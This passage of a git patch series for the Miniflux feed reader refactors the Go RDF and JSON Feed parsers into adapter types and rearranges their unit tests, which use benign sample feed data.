DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ creator"`
DublinCoreContent string `xml:"http://purl.org/rss/1.0/modules/content/ encoded"`
}
-
-func (item *DublinCoreItemElement) GetSanitizedCreator() string {
- return strings.TrimSpace(sanitizer.StripTags(item.DublinCoreCreator))
-}
diff --git a/internal/reader/rdf/adapter.go b/internal/reader/rdf/adapter.go
new file mode 100644
index 00000000..812badbc
--- /dev/null
+++ b/internal/reader/rdf/adapter.go
@@ -0,0 +1,115 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package rdf // import "miniflux.app/v2/internal/reader/rdf"
+
+import (
+ "html"
+ "log/slog"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type RDFAdapter struct {
+ rdf *RDF
+}
+
+func NewRDFAdapter(rdf *RDF) *RDFAdapter {
+ return &RDFAdapter{rdf}
+}
+
+func (r *RDFAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: stripTags(r.rdf.Channel.Title),
+ FeedURL: feedURL,
+ }
+
+ if feed.Title == "" {
+ feed.Title = feedURL
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err != nil {
+ feed.SiteURL = r.rdf.Channel.Link
+ } else {
+ feed.SiteURL = siteURL
+ }
+
+ for _, item := range r.rdf.Items {
+ entry := model.NewEntry()
+ itemLink := strings.TrimSpace(item.Link)
+
+ // Populate the entry URL from the item link, made absolute against the site URL when possible.
+ if itemLink == "" {
+ entry.URL = feed.SiteURL // Fallback to the site URL if the entry URL is empty.
+ } else if entryURL, err := urllib.AbsoluteURL(feed.SiteURL, itemLink); err == nil {
+ entry.URL = entryURL
+ } else {
+ entry.URL = itemLink
+ }
+
+ // Populate the entry title with the first non-empty of the item title and the Dublin Core title.
+ for _, title := range []string{item.Title, item.DublinCoreTitle} {
+ title = strings.TrimSpace(title)
+ if title != "" {
+ entry.Title = html.UnescapeString(title)
+ break
+ }
+ }
+
+ // If the entry title is empty, we use the entry URL as a fallback.
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ // Populate the entry content, preferring content:encoded over the item description.
+ if item.DublinCoreContent != "" {
+ entry.Content = item.DublinCoreContent
+ } else {
+ entry.Content = item.Description
+ }
+
+ // Generate the entry hash from the trimmed item link.
+ hashValue := itemLink
+ if hashValue == "" {
+ hashValue = item.Title + item.Description // Fallback to the title and description if the link is empty.
+ }
+
+ entry.Hash = crypto.Hash(hashValue)
+
+ // Populate the entry date, keeping the current time when dc:date is absent or cannot be parsed.
+ entry.Date = time.Now()
+ if item.DublinCoreDate != "" {
+ if itemDate, err := date.Parse(item.DublinCoreDate); err != nil {
+ slog.Debug("Unable to parse date from RDF feed",
+ slog.String("date", item.DublinCoreDate),
+ slog.String("link", itemLink),
+ slog.Any("error", err),
+ )
+ } else {
+ entry.Date = itemDate
+ }
+ }
+
+ // Populate the entry author, preferring the item's dc:creator over the channel's dc:creator.
+ switch {
+ case item.DublinCoreCreator != "":
+ entry.Author = stripTags(item.DublinCoreCreator)
+ case r.rdf.Channel.DublinCoreCreator != "":
+ entry.Author = stripTags(r.rdf.Channel.DublinCoreCreator)
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
+
+func stripTags(value string) string {
+ return strings.TrimSpace(sanitizer.StripTags(value))
+}
diff --git a/internal/reader/rdf/parser.go b/internal/reader/rdf/parser.go
index 695fb5ce..f743c5d7 100644
--- a/internal/reader/rdf/parser.go
+++ b/internal/reader/rdf/parser.go
@@ -13,10 +13,10 @@ import (
// Parse returns a normalized feed struct from a RDF feed.
func Parse(baseURL string, data io.ReadSeeker) (*model.Feed, error) {
- feed := new(rdfFeed)
- if err := xml.NewXMLDecoder(data).Decode(feed); err != nil {
+ xmlFeed := new(RDF)
+ if err := xml.NewXMLDecoder(data).Decode(xmlFeed); err != nil {
return nil, fmt.Errorf("rdf: unable to parse feed: %w", err)
}
- return feed.Transform(baseURL), nil
+ return NewRDFAdapter(xmlFeed).BuildFeed(baseURL), nil
}
diff --git a/internal/reader/rdf/parser_test.go b/internal/reader/rdf/parser_test.go
index 146c6c95..5009a412 100644
--- a/internal/reader/rdf/parser_test.go
+++ b/internal/reader/rdf/parser_test.go
@@ -228,63 +228,87 @@ func TestParseRDFSampleWithDublinCore(t *testing.T) {
}
}
-func TestParseItemWithOnlyFeedAuthor(t *testing.T) {
+func TestParseRDFFeedWithEmptyTitle(t *testing.T) {
data := `
-
-
-
- Meerkat
- http://meerkat.oreillynet.com
- Rael Dornfest (mailto:rael@oreilly.com)
-
-
-
- XML: A Disruptive Technology
- http://c.moreover.com/click/here.pl?r123
-
- XML is placing increasingly heavy loads on the existing technical
- infrastructure of the Internet.
-
-
+ xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+ xmlns="http://purl.org/rss/1.0/">
+
+ http://example.org/item
+
+
+ Example
+ http://example.org/item
+ Test
+ `
- feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if feed.Entries[0].Author != "Rael Dornfest (mailto:rael@oreilly.com)" {
- t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
+ if feed.Title != "http://example.org/feed" {
+ t.Errorf(`Incorrect title, got: %q`, feed.Title)
}
}
-func TestParseItemRelativeURL(t *testing.T) {
+func TestParseRDFFeedWithEmptyLink(t *testing.T) {
data := `
-
-
+
+
+ Example Feed
+
+ Example
- http://example.org
-
-
-
- Title
+ http://example.org/item
Test
- something.html
-
+
`
- feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if feed.Entries[0].URL != "http://example.org/something.html" {
- t.Errorf("Incorrect entry url, got: %s", feed.Entries[0].URL)
+ if feed.SiteURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect SiteURL, got: %q`, feed.SiteURL)
+ }
+
+ if feed.FeedURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect FeedURL, got: %q`, feed.FeedURL)
+ }
+}
+
+func TestParseRDFFeedWithRelativeLink(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ /test/index.html
+
+
+ Example
+ http://example.org/item
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://example.org/test/index.html" {
+ t.Errorf(`Incorrect SiteURL, got: %q`, feed.SiteURL)
+ }
+
+ if feed.FeedURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect FeedURL, got: %q`, feed.FeedURL)
}
}
@@ -321,63 +345,7 @@ func TestParseItemWithoutLink(t *testing.T) {
}
}
-func TestParseItemWithDublicCoreDate(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- Title
- Test
- http://example.org/test.html
- Tester
- 2018-04-10T05:00:00+00:00
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- expectedDate := time.Date(2018, time.April, 10, 5, 0, 0, 0, time.UTC)
- if !feed.Entries[0].Date.Equal(expectedDate) {
- t.Errorf("Incorrect entry date, got: %v, want: %v", feed.Entries[0].Date, expectedDate)
- }
-}
-
-func TestParseItemWithEncodedHTMLInDCCreatorField(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- Title
- Test
- http://example.org/test.html
- <a href="http://example.org/author1">Author 1</a> (University 1), <a href="http://example.org/author2">Author 2</a> (University 2)
- 2018-04-10T05:00:00+00:00
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- expectedAuthor := "Author 1 (University 1), Author 2 (University 2)"
- if feed.Entries[0].Author != expectedAuthor {
- t.Errorf("Incorrect entry author, got: %s, want: %s", feed.Entries[0].Author, expectedAuthor)
- }
-}
-
-func TestParseItemWithoutDate(t *testing.T) {
+func TestParseItemRelativeURL(t *testing.T) {
data := `
@@ -388,90 +356,17 @@ func TestParseItemWithoutDate(t *testing.T) {
TitleTest
- http://example.org/test.html
+ something.html
`
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- expectedDate := time.Now().In(time.Local)
- diff := expectedDate.Sub(feed.Entries[0].Date)
- if diff > time.Second {
- t.Errorf("Incorrect entry date, got: %v", diff)
- }
-}
-
-func TestParseItemWithEncodedHTMLTitle(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- AT&T
- Test
- http://example.org/test.html
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.Entries[0].Title != `AT&T` {
- t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
- }
-}
-
-func TestParseInvalidXml(t *testing.T) {
- data := `garbage`
- _, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err == nil {
- t.Fatal("Parse should returns an error")
- }
-}
-
-func TestParseFeedWithHTMLEntity(t *testing.T) {
- data := `
-
-
- Example Feed
- http://example.org
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.Title != "Example \u00a0 Feed" {
- t.Errorf(`Incorrect title, got: %q`, feed.Title)
- }
-}
-
-func TestParseFeedWithInvalidCharacterEntity(t *testing.T) {
- data := `
-
-
- Example Feed
- http://example.org/a&b
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.SiteURL != "http://example.org/a&b" {
- t.Errorf(`Incorrect URL, got: %q`, feed.SiteURL)
+ if feed.Entries[0].URL != "http://example.org/something.html" {
+ t.Errorf("Incorrect entry url, got: %s", feed.Entries[0].URL)
}
}
@@ -539,6 +434,130 @@ func TestParseFeedWithURLWrappedInSpaces(t *testing.T) {
}
}
+func TestParseRDFItemWitEmptyTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+
+ http://example.org/item
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `http://example.org/item`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseRDFItemWithDublinCoreTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+ Dublin Core Title
+ http://example.org/
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `Dublin Core Title`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseRDFItemWithDuplicateTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+ Item Title
+
+ http://example.org/
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `Item Title`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseItemWithEncodedHTMLTitle(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org
+
+
+
+ AT&T
+ Test
+ http://example.org/test.html
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Title != `AT&T` {
+ t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
+ }
+}
+
func TestParseRDFWithContentEncoded(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
- Item Title
-
- http://example.org/
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `Item Title`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Now().In(time.Local)
+ diff := expectedDate.Sub(feed.Entries[0].Date)
+ if diff > time.Second {
+ t.Errorf("Incorrect entry date, got: %v", diff)
}
}
-func TestParseRDFItemWithDublinCoreTitleElement(t *testing.T) {
+func TestParseItemWithDublicCoreDate(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
- Dublin Core Title
- http://example.org/
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ Tester
+ 2018-04-10T05:00:00+00:00
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `Dublin Core Title`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Date(2018, time.April, 10, 5, 0, 0, 0, time.UTC)
+ if !feed.Entries[0].Date.Equal(expectedDate) {
+ t.Errorf("Incorrect entry date, got: %v, want: %v", feed.Entries[0].Date, expectedDate)
}
}
-func TestParseRDFItemWitEmptyTitleElement(t *testing.T) {
+func TestParseItemWithInvalidDublicCoreDate(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
-
- http://example.org/item
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ Tester
+ 20-04-10T05:00:00+00:00
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `http://example.org/item`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Now().In(time.Local)
+ diff := expectedDate.Sub(feed.Entries[0].Date)
+ if diff > time.Second {
+ t.Errorf("Incorrect entry date, got: %v", diff)
+ }
+}
+
+func TestParseItemWithEncodedHTMLInDCCreatorField(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org
+
+
+
+ Title
+ Test
+ http://example.org/test.html
+ <a href="http://example.org/author1">Author 1</a> (University 1), <a href="http://example.org/author2">Author 2</a> (University 2)
+ 2018-04-10T05:00:00+00:00
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expectedAuthor := "Author 1 (University 1), Author 2 (University 2)"
+ if feed.Entries[0].Author != expectedAuthor {
+ t.Errorf("Incorrect entry author, got: %s, want: %s", feed.Entries[0].Author, expectedAuthor)
+ }
+}
+
+func TestParseItemWithOnlyFeedAuthor(t *testing.T) {
+ data := `
+
+
+
+ Meerkat
+ http://meerkat.oreillynet.com
+ Rael Dornfest (mailto:rael@oreilly.com)
+
+
+
+ XML: A Disruptive Technology
+ http://c.moreover.com/click/here.pl?r123
+
+ XML is placing increasingly heavy loads on the existing technical
+ infrastructure of the Internet.
+
+
+ `
+
+ feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Author != "Rael Dornfest (mailto:rael@oreilly.com)" {
+ t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
+ }
+}
+
+func TestParseInvalidXml(t *testing.T) {
+ data := `garbage`
+ _, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err == nil {
+ t.Fatal("Parse should returns an error")
+ }
+}
+
+func TestParseFeedWithHTMLEntity(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Title != "Example \u00a0 Feed" {
+ t.Errorf(`Incorrect title, got: %q`, feed.Title)
+ }
+}
+
+func TestParseFeedWithInvalidCharacterEntity(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/a&b
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://example.org/a&b" {
+ t.Errorf(`Incorrect URL, got: %q`, feed.SiteURL)
}
}
diff --git a/internal/reader/rdf/rdf.go b/internal/reader/rdf/rdf.go
index 8ce454d7..5adaeeb9 100644
--- a/internal/reader/rdf/rdf.go
+++ b/internal/reader/rdf/rdf.go
@@ -5,130 +5,27 @@ package rdf // import "miniflux.app/v2/internal/reader/rdf"
import (
"encoding/xml"
- "html"
- "log/slog"
- "strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/dublincore"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
-type rdfFeed struct {
- XMLName xml.Name `xml:"RDF"`
- Title string `xml:"channel>title"`
- Link string `xml:"channel>link"`
- Items []rdfItem `xml:"item"`
- dublincore.DublinCoreFeedElement
+// RDF specs: https://web.resource.org/rss/1.0/spec
+type RDF struct {
+ XMLName xml.Name `xml:"http://www.w3.org/1999/02/22-rdf-syntax-ns# RDF"`
+ Channel RDFChannel `xml:"channel"`
+ Items []RDFItem `xml:"item"`
}
-func (r *rdfFeed) Transform(baseURL string) *model.Feed {
- var err error
- feed := new(model.Feed)
- feed.Title = sanitizer.StripTags(r.Title)
- feed.FeedURL = baseURL
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, r.Link)
- if err != nil {
- feed.SiteURL = r.Link
- }
-
- for _, item := range r.Items {
- entry := item.Transform()
- if entry.Author == "" && r.DublinCoreCreator != "" {
- entry.Author = r.GetSanitizedCreator()
- }
-
- if entry.URL == "" {
- entry.URL = feed.SiteURL
- } else {
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
+type RDFChannel struct {
+ Title string `xml:"title"`
+ Link string `xml:"link"`
+ Description string `xml:"description"`
+ dublincore.DublinCoreChannelElement
}
-type rdfItem struct {
+type RDFItem struct {
Title string `xml:"http://purl.org/rss/1.0/ title"`
Link string `xml:"link"`
Description string `xml:"description"`
dublincore.DublinCoreItemElement
}
-
-func (r *rdfItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.Title = r.entryTitle()
- entry.Author = r.entryAuthor()
- entry.URL = r.entryURL()
- entry.Content = r.entryContent()
- entry.Hash = r.entryHash()
- entry.Date = r.entryDate()
-
- if entry.Title == "" {
- entry.Title = entry.URL
- }
- return entry
-}
-
-func (r *rdfItem) entryTitle() string {
- for _, title := range []string{r.Title, r.DublinCoreTitle} {
- title = strings.TrimSpace(title)
- if title != "" {
- return html.UnescapeString(title)
- }
- }
- return ""
-}
-
-func (r *rdfItem) entryContent() string {
- switch {
- case r.DublinCoreContent != "":
- return r.DublinCoreContent
- default:
- return r.Description
- }
-}
-
-func (r *rdfItem) entryAuthor() string {
- return r.GetSanitizedCreator()
-}
-
-func (r *rdfItem) entryURL() string {
- return strings.TrimSpace(r.Link)
-}
-
-func (r *rdfItem) entryDate() time.Time {
- if r.DublinCoreDate != "" {
- result, err := date.Parse(r.DublinCoreDate)
- if err != nil {
- slog.Debug("Unable to parse date from RDF feed",
- slog.String("date", r.DublinCoreDate),
- slog.String("link", r.Link),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (r *rdfItem) entryHash() string {
- value := r.Link
- if value == "" {
- value = r.Title + r.Description
- }
-
- return crypto.Hash(value)
-}
From 8429c6b0abfbfe3d0ef8eea1eb8aceff810d3069 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Tue, 12 Mar 2024 22:10:59 -0700
Subject: [PATCH 05/80] Refactor JSON Feed parser to use an adapter
---
internal/reader/json/adapter.go | 173 +++++++++++++++
internal/reader/json/json.go | 320 +++++++++++-----------------
internal/reader/json/parser.go | 6 +-
internal/reader/json/parser_test.go | 241 ++++++++++++++++-----
4 files changed, 487 insertions(+), 253 deletions(-)
create mode 100644 internal/reader/json/adapter.go
diff --git a/internal/reader/json/adapter.go b/internal/reader/json/adapter.go
new file mode 100644
index 00000000..d62ff976
--- /dev/null
+++ b/internal/reader/json/adapter.go
@@ -0,0 +1,173 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package json // import "miniflux.app/v2/internal/reader/json"
+
+import (
+ "log/slog"
+ "sort"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type JSONAdapter struct {
+ jsonFeed *JSONFeed
+}
+
+func NewJSONAdapter(jsonFeed *JSONFeed) *JSONAdapter {
+ return &JSONAdapter{jsonFeed}
+}
+
+func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: strings.TrimSpace(j.jsonFeed.Title),
+ FeedURL: j.jsonFeed.FeedURL,
+ SiteURL: j.jsonFeed.HomePageURL,
+ }
+
+ if feed.FeedURL == "" {
+ feed.FeedURL = feedURL
+ }
+
+ // Fallback to the feed URL if the site URL is empty.
+ if feed.SiteURL == "" {
+ feed.SiteURL = feed.FeedURL
+ }
+
+ if feedURL, err := urllib.AbsoluteURL(feedURL, j.jsonFeed.FeedURL); err == nil {
+ feed.FeedURL = feedURL
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, j.jsonFeed.HomePageURL); err == nil {
+ feed.SiteURL = siteURL
+ }
+
+ // Fallback to the site URL if the title is empty.
+ if feed.Title == "" {
+ feed.Title = feed.SiteURL
+ }
+
+ // Populate the icon URL if present.
+ for _, iconURL := range []string{j.jsonFeed.FaviconURL, j.jsonFeed.IconURL} {
+ iconURL = strings.TrimSpace(iconURL)
+ if iconURL != "" {
+ if absoluteIconURL, err := urllib.AbsoluteURL(feed.SiteURL, iconURL); err == nil {
+ feed.IconURL = absoluteIconURL
+ break
+ }
+ }
+ }
+
+ for _, item := range j.jsonFeed.Items {
+ entry := model.NewEntry()
+ entry.Title = strings.TrimSpace(item.Title)
+ entry.URL = strings.TrimSpace(item.URL)
+
+ // Make sure the entry URL is absolute.
+ if entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL); err == nil {
+ entry.URL = entryURL
+ }
+
+ // The entry title is optional, so we need to find a fallback.
+ if entry.Title == "" {
+ for _, value := range []string{item.Summary, item.ContentText, item.ContentHTML} {
+ if value != "" {
+ entry.Title = sanitizer.TruncateHTML(value, 100)
+ }
+ }
+ }
+
+ // Fallback to the entry URL if the title is empty.
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ // Populate the entry content.
+ for _, value := range []string{item.ContentHTML, item.ContentText, item.Summary} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ entry.Content = value
+ break
+ }
+ }
+
+ // Populate the entry date.
+ entry.Date = time.Now()
+ for _, value := range []string{item.DatePublished, item.DateModified} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ if date, err := date.Parse(value); err != nil {
+ slog.Debug("Unable to parse date from JSON feed",
+ slog.String("date", value),
+ slog.String("url", entry.URL),
+ slog.Any("error", err),
+ )
+ } else {
+ entry.Date = date
+ break
+ }
+ }
+ }
+
+ // Populate the entry author.
+ itemAuthors := append(item.Authors, j.jsonFeed.Authors...)
+ itemAuthors = append(itemAuthors, item.Author, j.jsonFeed.Author)
+
+ authorNamesMap := make(map[string]bool)
+ for _, author := range itemAuthors {
+ authorName := strings.TrimSpace(author.Name)
+ if authorName != "" {
+ authorNamesMap[authorName] = true
+ }
+ }
+
+ var authors []string
+ for authorName := range authorNamesMap {
+ authors = append(authors, authorName)
+ }
+
+ sort.Strings(authors)
+ entry.Author = strings.Join(authors, ", ")
+
+ // Populate the entry enclosures.
+ for _, attachment := range item.Attachments {
+ attachmentURL := strings.TrimSpace(attachment.URL)
+ if attachmentURL != "" {
+ if absoluteAttachmentURL, err := urllib.AbsoluteURL(feed.SiteURL, attachmentURL); err == nil {
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: absoluteAttachmentURL,
+ MimeType: attachment.MimeType,
+ Size: attachment.Size,
+ })
+ }
+ }
+ }
+
+ // Populate the entry tags.
+ for _, tag := range item.Tags {
+ tag = strings.TrimSpace(tag)
+ if tag != "" {
+ entry.Tags = append(entry.Tags, tag)
+ }
+ }
+
+ // Generate a hash for the entry.
+ for _, value := range []string{item.ID, item.URL, item.ContentText + item.ContentHTML + item.Summary} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
diff --git a/internal/reader/json/json.go b/internal/reader/json/json.go
index c6920947..58a06006 100644
--- a/internal/reader/json/json.go
+++ b/internal/reader/json/json.go
@@ -3,207 +3,141 @@
package json // import "miniflux.app/v2/internal/reader/json"
-import (
- "log/slog"
- "strings"
- "time"
+// JSON Feed specs:
+// https://www.jsonfeed.org/version/1.1/
+// https://www.jsonfeed.org/version/1/
+type JSONFeed struct {
+ // Version is the URL of the version of the format the feed uses.
+ // This should appear at the very top, though we recognize that not all JSON generators allow for ordering.
+ Version string `json:"version"`
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
-)
+ // Title is the name of the feed, which will often correspond to the name of the website.
+ Title string `json:"title"`
-type jsonFeed struct {
- Version string `json:"version"`
- Title string `json:"title"`
- SiteURL string `json:"home_page_url"`
- IconURL string `json:"icon"`
- FaviconURL string `json:"favicon"`
- FeedURL string `json:"feed_url"`
- Authors []jsonAuthor `json:"authors"`
- Author jsonAuthor `json:"author"`
- Items []jsonItem `json:"items"`
+ // HomePageURL is the URL of the resource that the feed describes.
+ // This resource may or may not actually be a “home” page, but it should be an HTML page.
+ HomePageURL string `json:"home_page_url"`
+
+ // FeedURL is the URL of the feed, and serves as the unique identifier for the feed.
+ FeedURL string `json:"feed_url"`
+
+ // Description provides more detail, beyond the title, on what the feed is about.
+ Description string `json:"description"`
+
+ // IconURL is the URL of an image for the feed suitable to be used in a timeline, much the way an avatar might be used.
+ IconURL string `json:"icon"`
+
+ // FaviconURL is the URL of an image for the feed suitable to be used in a source list. It should be square and relatively small.
+ FaviconURL string `json:"favicon"`
+
+ // Authors specifies one or more feed authors. The author object has several members.
+ Authors []JSONAuthor `json:"authors"` // JSON Feed v1.1
+
+ // Author specifies the feed author. The author object has several members.
+ // JSON Feed v1 (deprecated)
+ Author JSONAuthor `json:"author"`
+
+ // Language is the primary language for the feed in the format specified in RFC 5646.
+ // The value is usually a 2-letter language tag from ISO 639-1, optionally followed by a region tag. (Examples: en or en-US.)
+ Language string `json:"language"`
+
+ // Expired is a boolean value that specifies whether or not the feed is finished.
+ Expired bool `json:"expired"`
+
+ // Items is an array, each representing an individual item in the feed.
+ Items []JSONItem `json:"items"`
+
+ // Hubs describes endpoints that can be used to subscribe to real-time notifications from the publisher of this feed.
+ Hubs []JSONHub `json:"hubs"`
}
-type jsonAuthor struct {
+type JSONAuthor struct {
+ // Author's name.
Name string `json:"name"`
- URL string `json:"url"`
+
+ // Author's website URL (Blog or micro-blog).
+ WebsiteURL string `json:"url"`
+
+ // Author's avatar URL.
+ AvatarURL string `json:"avatar"`
}
-type jsonItem struct {
- ID string `json:"id"`
- URL string `json:"url"`
- Title string `json:"title"`
- Summary string `json:"summary"`
- Text string `json:"content_text"`
- HTML string `json:"content_html"`
- DatePublished string `json:"date_published"`
- DateModified string `json:"date_modified"`
